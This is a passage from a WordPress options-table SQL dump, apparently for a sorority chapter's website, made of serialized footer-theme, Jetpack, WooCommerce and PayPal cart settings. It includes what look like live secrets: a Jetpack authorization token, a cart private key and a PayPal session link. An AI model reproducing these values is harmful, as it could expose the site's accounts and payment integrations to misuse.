DDDDD\";s:15:\"menu-text-color\";s:7:\"#FFFFFF\";s:19:\"menu-bg-color-hover\";s:7:\"#DDDDDD\";s:21:\"menu-text-color-hover\";s:7:\"#FFFFFF\";s:16:\"submenu-bg-color\";s:7:\"#DDDDDD\";s:18:\"submenu-text-color\";s:7:\"#FFFFFF\";s:22:\"submenu-bg-color-hover\";s:7:\"#DDDDDD\";s:24:\"submenu-text-color-hover\";s:7:\"#FFFFFF\";s:15:\"menu-text-align\";s:20:\"menu-text-align-left\";s:11:\"admin-label\";s:0:\"\";s:9:\"uppercase\";s:17:\"menu-no-uppercase\";}}}}}}}}','yes'),(153,'hopeful_footer','a:1:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:7:\"#D3D3D3\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"left\";s:13:\"bgAttachement\";s:5:\"fixed\";s:8:\"bgRepeat\";s:6:\"repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:2:\"30\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:6:{i:0;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:3:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:1;a:4:{s:4:\"type\";s:9:\"delimiter\";s:14:\"delimiter-type\";s:10:\"doubleline\";s:15:\"delimiter-color\";s:7:\"#FFFFFF\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:3:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:61:\"https://zphiblgz.org/wp-content/uploads/2016/12/zphibtext.gif\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:365:\"<p><a href=--quote--https://zphiblgz.org/--quote-->Home</a><br /><a href=--quote--https://zphiblgz.org/history/--quote-->History</a><br /><a href=--quote--https://zphiblgz.org/programs/--quote-->Programs</a><br /><a href=--quote--https://zphiblgz.org/scholarship/--quote-->Scholarship<br /></a><a href=--quote--https://zphiblgz.org/service/--quote-->Service</a></p>\";s:11:\"admin-label\";s:0:\"\";}}}i:2;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:4:{i:0;a:3:{s:4:\"type\";s:7:\"sidebar\";s:10:\"sidebar-id\";s:4:\"main\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:14:\"social-buttons\";s:12:\"social-align\";s:9:\"text-left\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:3;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:68:\"https://zphiblgz.org/wp-content/uploads/2017/01/Contribute-Now-1.png\";s:11:\"forward-url\";s:192:\"https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=yinS5i75KRVWtwF4ReGLRro06tkzLRgMxBQLsm7Ao552uu_PwlQkVrSN2EK&dispatch=5885d80a13c0db1f8e263663d3faee8d333dc9aadeed3fe0b5b299d55fd35542\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:3;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:3:{i:0;a:3:{s:4:\"type\";s:7:\"sidebar\";s:10:\"sidebar-id\";s:24:\"ts-sidebar-5875a66db9e4b\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:2;a:1:{s:4:\"type\";s:5:\"empty\";}}}i:4;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:2:{i:0;a:3:{s:4:\"type\";s:7:\"sidebar\";s:10:\"sidebar-id\";i:0;s:11:\"admin-label\";s:0:\"\";}i:1;a:4:{s:4:\"type\";s:10:\"shortcodes\";s:11:\"admin-label\";s:0:\"\";s:8:\"paddings\";s:1:\"n\";s:10:\"shortcodes\";s:26:\"[si-contact-form form=\'1\']\";}}}i:5;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:4:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:1;a:4:{s:4:\"type\";s:9:\"delimiter\";s:14:\"delimiter-type\";s:10:\"doubleline\";s:15:\"delimiter-color\";s:7:\"#FFFFFF\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:113:\"<p style=--quote--text-align: center;--quote-->Copyright 2017 Lambda Gamma Zeta Chapter. All rights reserved.</p>\";s:11:\"admin-label\";s:0:\"\";}}}}}}','yes'),(154,'hopeful_footer_template_id','default','yes'),(155,'hopeful_footer_templates','a:3:{s:7:\"default\";a:2:{s:4:\"name\";s:16:\"Default template\";s:8:\"elements\";a:1:{i:0;a:2:{s:8:\"settings\";a:24:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:7:\"#f6f6f6\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"left\";s:13:\"bgAttachement\";s:5:\"fixed\";s:8:\"bgRepeat\";s:6:\"repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:2:\"40\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:2:\"40\";s:16:\"rowPaddingBottom\";s:2:\"40\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:1:{i:0;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:63:\"Copyright TouchSize. All rights reserved. www.touchsize.com</p>\";s:11:\"admin-label\";s:0:\"\";}}}}}}}s:22:\"ts-template-1521691317\";a:2:{s:4:\"name\";s:13:\"Custom Footer\";s:8:\"elements\";a:1:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:7:\"#D3D3D3\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"left\";s:13:\"bgAttachement\";s:5:\"fixed\";s:8:\"bgRepeat\";s:6:\"repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:2:\"30\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:6:{i:0;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:3:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:1;a:4:{s:4:\"type\";s:9:\"delimiter\";s:14:\"delimiter-type\";s:10:\"doubleline\";s:15:\"delimiter-color\";s:7:\"#FFFFFF\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:3:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:61:\"https://zphiblgz.org/wp-content/uploads/2016/12/zphibtext.gif\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:365:\"<p><a href=--quote--https://zphiblgz.org/--quote-->Home</a><br /><a href=--quote--https://zphiblgz.org/history/--quote-->History</a><br /><a href=--quote--https://zphiblgz.org/programs/--quote-->Programs</a><br /><a href=--quote--https://zphiblgz.org/scholarship/--quote-->Scholarship<br /></a><a href=--quote--https://zphiblgz.org/service/--quote-->Service</a></p>\";s:11:\"admin-label\";s:0:\"\";}}}i:2;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:4:{i:0;a:3:{s:4:\"type\";s:7:\"sidebar\";s:10:\"sidebar-id\";s:4:\"main\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:14:\"social-buttons\";s:12:\"social-align\";s:9:\"text-left\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:3;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:68:\"https://zphiblgz.org/wp-content/uploads/2017/01/Contribute-Now-1.png\";s:11:\"forward-url\";s:192:\"https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=yinS5i75KRVWtwF4ReGLRro06tkzLRgMxBQLsm7Ao552uu_PwlQkVrSN2EK&dispatch=5885d80a13c0db1f8e263663d3faee8d333dc9aadeed3fe0b5b299d55fd35542\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:3;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:3:{i:0;a:3:{s:4:\"type\";s:7:\"sidebar\";s:10:\"sidebar-id\";s:24:\"ts-sidebar-5875a66db9e4b\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:2;a:1:{s:4:\"type\";s:5:\"empty\";}}}i:4;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:2:{i:0;a:3:{s:4:\"type\";s:7:\"sidebar\";s:10:\"sidebar-id\";i:0;s:11:\"admin-label\";s:0:\"\";}i:1;a:4:{s:4:\"type\";s:10:\"shortcodes\";s:11:\"admin-label\";s:0:\"\";s:8:\"paddings\";s:1:\"n\";s:10:\"shortcodes\";s:26:\"[si-contact-form form=\'1\']\";}}}i:5;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:4:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:1;a:4:{s:4:\"type\";s:9:\"delimiter\";s:14:\"delimiter-type\";s:10:\"doubleline\";s:15:\"delimiter-color\";s:7:\"#FFFFFF\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:113:\"<p style=--quote--text-align: center;--quote-->Copyright 2017 Lambda Gamma Zeta Chapter. All rights reserved.</p>\";s:11:\"admin-label\";s:0:\"\";}}}}}}}s:22:\"ts-template-1536991712\";a:2:{s:4:\"name\";s:15:\"Footer Template\";s:8:\"elements\";a:1:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:7:\"#D3D3D3\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"left\";s:13:\"bgAttachement\";s:5:\"fixed\";s:8:\"bgRepeat\";s:6:\"repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:2:\"30\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:6:{i:0;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:3:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:1;a:4:{s:4:\"type\";s:9:\"delimiter\";s:14:\"delimiter-type\";s:10:\"doubleline\";s:15:\"delimiter-color\";s:7:\"#FFFFFF\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:3:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:61:\"https://zphiblgz.org/wp-content/uploads/2016/12/zphibtext.gif\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:365:\"<p><a href=--quote--https://zphiblgz.org/--quote-->Home</a><br /><a href=--quote--https://zphiblgz.org/history/--quote-->History</a><br /><a href=--quote--https://zphiblgz.org/programs/--quote-->Programs</a><br /><a href=--quote--https://zphiblgz.org/scholarship/--quote-->Scholarship<br /></a><a href=--quote--https://zphiblgz.org/service/--quote-->Service</a></p>\";s:11:\"admin-label\";s:0:\"\";}}}i:2;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:4:{i:0;a:3:{s:4:\"type\";s:7:\"sidebar\";s:10:\"sidebar-id\";s:4:\"main\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:14:\"social-buttons\";s:12:\"social-align\";s:9:\"text-left\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:3;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:68:\"https://zphiblgz.org/wp-content/uploads/2017/01/Contribute-Now-1.png\";s:11:\"forward-url\";s:192:\"https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=yinS5i75KRVWtwF4ReGLRro06tkzLRgMxBQLsm7Ao552uu_PwlQkVrSN2EK&dispatch=5885d80a13c0db1f8e263663d3faee8d333dc9aadeed3fe0b5b299d55fd35542\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:3;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:3:{i:0;a:3:{s:4:\"type\";s:7:\"sidebar\";s:10:\"sidebar-id\";s:24:\"ts-sidebar-5875a66db9e4b\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:2;a:1:{s:4:\"type\";s:5:\"empty\";}}}i:4;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:2:{i:0;a:3:{s:4:\"type\";s:7:\"sidebar\";s:10:\"sidebar-id\";i:0;s:11:\"admin-label\";s:0:\"\";}i:1;a:4:{s:4:\"type\";s:10:\"shortcodes\";s:11:\"admin-label\";s:0:\"\";s:8:\"paddings\";s:1:\"n\";s:10:\"shortcodes\";s:26:\"[si-contact-form form=\'1\']\";}}}i:5;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:4:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:1;a:4:{s:4:\"type\";s:9:\"delimiter\";s:14:\"delimiter-type\";s:10:\"doubleline\";s:15:\"delimiter-color\";s:7:\"#FFFFFF\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:113:\"<p style=--quote--text-align: center;--quote-->Copyright 2017 Lambda Gamma Zeta Chapter. All rights reserved.</p>\";s:11:\"admin-label\";s:0:\"\";}}}}}}}}','yes'),(156,'hopeful_first_activation','no','yes'),(234,'jetpack_available_modules','a:1:{s:5:\"4.4.1\";a:37:{s:18:\"after-the-deadline\";s:3:\"1.1\";s:8:\"carousel\";s:3:\"1.5\";s:8:\"comments\";s:3:\"1.4\";s:12:\"contact-form\";s:3:\"1.3\";s:20:\"custom-content-types\";s:3:\"3.1\";s:10:\"custom-css\";s:3:\"1.7\";s:21:\"enhanced-distribution\";s:3:\"1.2\";s:19:\"gravatar-hovercards\";s:3:\"1.1\";s:15:\"infinite-scroll\";s:3:\"2.0\";s:8:\"json-api\";s:3:\"1.9\";s:5:\"latex\";s:3:\"1.1\";s:5:\"likes\";s:3:\"2.2\";s:6:\"manage\";s:3:\"3.4\";s:8:\"markdown\";s:3:\"2.8\";s:9:\"minileven\";s:3:\"1.8\";s:7:\"monitor\";s:3:\"2.6\";s:5:\"notes\";s:3:\"1.9\";s:10:\"omnisearch\";s:3:\"2.3\";s:6:\"photon\";s:3:\"2.0\";s:13:\"post-by-email\";s:3:\"2.0\";s:7:\"protect\";s:3:\"3.4\";s:9:\"publicize\";s:3:\"2.0\";s:13:\"related-posts\";s:3:\"2.9\";s:9:\"seo-tools\";s:3:\"4.4\";s:10:\"sharedaddy\";s:3:\"1.1\";s:10:\"shortcodes\";s:3:\"1.1\";s:10:\"shortlinks\";s:3:\"1.1\";s:8:\"sitemaps\";s:3:\"3.9\";s:3:\"sso\";s:3:\"2.6\";s:5:\"stats\";s:3:\"1.1\";s:13:\"subscriptions\";s:3:\"1.2\";s:13:\"tiled-gallery\";s:3:\"2.1\";s:10:\"vaultpress\";s:5:\"0:1.2\";s:18:\"verification-tools\";s:3:\"3.0\";s:10:\"videopress\";s:3:\"2.5\";s:17:\"widget-visibility\";s:3:\"2.4\";s:7:\"widgets\";s:3:\"1.2\";}}','yes'),(236,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(244,'jetpack_log','a:1:{i:0;a:4:{s:4:\"time\";i:1480637756;s:7:\"user_id\";i:1;s:7:\"blog_id\";b:0;s:4:\"code\";s:8:\"register\";}}','no'),(238,'do_activate','0','yes'),(243,'jetpack_connection_banner_ab','2','yes'),(245,'jetpack_private_options','a:1:{s:9:\"authorize\";s:78:\"XgbWcO4DWP4k7zQR083drhZpd3Ghm0mt:0KgDz7wZutxIzsB2JBLbSRO2PX5jmOa7:1480638520:1\";}','yes'),(395,'_transient_woocommerce_webhook_ids','a:0:{}','yes'),(396,'widget_woocommerce_widget_cart','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(393,'woocommerce_admin_notices','a:2:{i:0;s:6:\"update\";i:1;s:14:\"template_files\";}','yes'),(373,'woocommerce_myaccount_downloads_endpoint','downloads','yes'),(17922,'rg_gforms_message','<!--GFM--><!-- unregistered copy notice -->\r\n<div style=\\\"margin:10px 0 10px 0; border-bottom:1px solid #D7D7D7; text-align:center; display:block!important; visibility: visible!important; min-width:880px;\\\"><a href=\\\"http://www.gravityforms.com/purchase-gravity-forms/\\\" target=\\\"_blank\\\" style=\\\"width:880px; height:90px;\\\"><img src=\\\"https://gravityforms.s3.amazonaws.com/banners/gravity-forms-unregistered-2.png\\\" width=\\\"880\\\" height=\\\"90\\\" alt=\\\"Unlicensed Copy. Please purchase a Gravity Forms license\\\" title=\\\"Unlicensed Copy\\\" /></a></div>\r\n<!-- end notice -->','yes'),(17830,'rg_gforms_enable_akismet','1','yes'),(17831,'rg_gforms_currency','USD','yes'),(17832,'gform_enable_toolbar_menu','1','yes'),(2299,'um_cached_users_queue','0','no'),(473,'_transient_wc_attribute_taxonomies','a:0:{}','yes'),(374,'woocommerce_myaccount_edit_account_endpoint','edit-account','yes'),(375,'woocommerce_myaccount_edit_address_endpoint','edit-address','yes'),(376,'woocommerce_myaccount_payment_methods_endpoint','payment-methods','yes'),(377,'woocommerce_myaccount_lost_password_endpoint','lost-password','yes'),(378,'woocommerce_logout_endpoint','customer-logout','yes'),(379,'woocommerce_email_from_name','Development','no'),(380,'woocommerce_email_from_address','pr@zphiblgz.org','no'),(381,'woocommerce_email_header_image','','no'),(382,'woocommerce_email_footer_text','Development - Powered by WooCommerce','no'),(383,'woocommerce_email_base_color','#557da1','no'),(384,'woocommerce_email_background_color','#f5f5f5','no'),(385,'woocommerce_email_body_background_color','#fdfdfd','no'),(386,'woocommerce_email_text_color','#505050','no'),(387,'woocommerce_api_enabled','yes','yes'),(411,'woocommerce_meta_box_errors','a:0:{}','yes'),(471,'woocommerce_db_version','2.6.8','yes'),(102841,'woocommerce_version','3.4.2','yes'),(397,'widget_woocommerce_layered_nav_filters','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(398,'widget_woocommerce_layered_nav','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(399,'widget_woocommerce_price_filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(400,'widget_woocommerce_product_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(401,'widget_woocommerce_product_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(402,'widget_woocommerce_product_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(403,'widget_woocommerce_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(404,'widget_woocommerce_rating_filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(405,'widget_woocommerce_recent_reviews','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(406,'widget_woocommerce_recently_viewed_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(407,'widget_woocommerce_top_rated_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(427,'_transient_product-transient-version','1509147497','yes'),(450,'wp_shopping_cart_collect_address','','yes'),(451,'wp_shopping_cart_use_profile_shipping','','yes'),(452,'cart_paypal_email','paypal@zphiblgz.org','yes'),(453,'addToCartButtonName','Add to Cart','yes'),(454,'cart_cancel_from_paypal_url','https://zphiblgz.org','yes'),(455,'cart_products_page_url','','yes'),(456,'wp_shopping_cart_auto_redirect_to_checkout_page','','yes'),(457,'cart_checkout_page_url','','yes'),(458,'wspsc_open_pp_checkout_in_new_tab','checked=\"checked\"','yes'),(459,'wp_shopping_cart_reset_after_redirection_to_return_page','checked=\"checked\"','yes'),(460,'wp_shopping_cart_image_hide','','yes'),(461,'wp_cart_note_to_seller_text','','yes'),(462,'wp_cart_paypal_co_page_style','','yes'),(463,'wp_shopping_cart_strict_email_check','','yes'),(464,'wspsc_disable_nonce_add_cart','','yes'),(465,'wp_use_aff_platform','','yes'),(425,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(426,'_transient_product_query-transient-version','1509219763','yes'),(431,'wp_cart_title','Your Shopping Cart','yes'),(432,'wp_cart_empty_text','Your cart is empty','yes'),(433,'cart_return_from_paypal_url','https://zphiblgz.org','yes'),(434,'wpspc_send_buyer_email','checked=\"checked\"','yes'),(435,'wpspc_buyer_from_email','paypal@zphiblgz.org','yes'),(436,'wpspc_buyer_email_subj','Thank you for the purchase','yes'),(437,'wpspc_buyer_email_body','Dear {first_name} {last_name}\r\n\r\nThank you for your purchase! You ordered the following item(s):\r\n\r\n{product_details}','yes'),(438,'wpspc_notify_email_address','paypal@zphiblgz.org','yes'),(439,'wpspc_seller_email_subj','Notification of product sale','yes'),(440,'wpspc_seller_email_body','Dear Seller\r\n\r\nThis mail is to notify you of a product sale.\r\n\r\n{product_details}\r\n\r\nThe sale was made to {first_name} {last_name} ({payer_email})\r\n\r\nThanks','yes'),(441,'wspsc_private_key_one','5841a0a9be6b35.43187322','yes'),(442,'widget_wp_paypal_shopping_cart_widgets','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(446,'cart_payment_currency','USD','yes'),(447,'cart_currency_symbol','$','yes'),(448,'cart_base_shipping_cost','0','yes'),(449,'cart_free_shipping_threshold','','yes'),(466,'wp_shopping_cart_enable_sandbox','','yes'),(467,'wp_shopping_cart_enable_debug','','yes'),(468,'wpspc_send_seller_email','','yes'),(98757,'product_cat_children','a:0:{}','yes'),(488,'woocommerce_paypal-braintree_settings','a:1:{s:7:\"enabled\";s:3:\"yes\";}','yes'),(489,'woocommerce_stripe_settings','a:1:{s:7:\"enabled\";s:2:\"no\";}','yes'),(490,'woocommerce_paypal_settings','a:2:{s:7:\"enabled\";s:2:\"no\";s:5:\"email\";s:15:\"pr@zphiblgz.org\";}','yes'),(491,'woocommerce_cheque_settings','a:1:{s:7:\"enabled\";s:2:\"no\";}','yes'),(492,'woocommerce_bacs_settings','a:1:{s:7:\"enabled\";s:2:\"no\";}','yes'),(493,'woocommerce_cod_settings','a:1:{s:7:\"enabled\";s:2:\"no\";}','yes'),(495,'woocommerce_allow_tracking','no','yes'),(508,'woocommerce_express_checkout_settings','a:34:{s:7:\"enabled\";s:3:\"yes\";s:5:\"title\";s:14:\"PayPal Express\";s:11:\"description\";s:84:\"Pay via PayPal; you can pay with your credit card if you don\'t have a PayPal account\";s:15:\"api_credentials\";s:0:\"\";s:8:\"testmode\";s:2:\"no\";s:20:\"sandbox_api_username\";s:0:\"\";s:20:\"sandbox_api_password\";s:0:\"\";s:21:\"sandbox_api_signature\";s:0:\"\";s:12:\"api_username\";s:0:\"\";s:12:\"api_password\";s:0:\"\";s:13:\"api_signature\";s:0:\"\";s:15:\"display_options\";s:0:\"\";s:21:\"checkout_button_style\";s:5:\"image\";s:29:\"hide_standard_checkout_button\";s:3:\"yes\";s:17:\"show_on_cart_page\";s:3:\"yes\";s:16:\"show_on_checkout\";s:2:\"no\";s:20:\"show_on_product_page\";s:2:\"no\";s:17:\"invoice_id_prefix\";s:0:\"\";s:23:\"paypal_account_optional\";s:3:\"yes\";s:12:\"landing_page\";s:5:\"login\";s:18:\"error_email_notify\";s:3:\"yes\";s:18:\"error_display_type\";s:8:\"detailed\";s:18:\"show_paypal_credit\";s:2:\"no\";s:18:\"use_wp_locale_code\";s:3:\"yes\";s:10:\"brand_name\";s:54:\"Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta Chapter\";s:13:\"checkout_logo\";s:0:\"\";s:20:\"checkout_logo_hdrimg\";s:0:\"\";s:23:\"customer_service_number\";s:0:\"\";s:9:\"skip_text\";s:42:\"Skip the forms and pay faster with 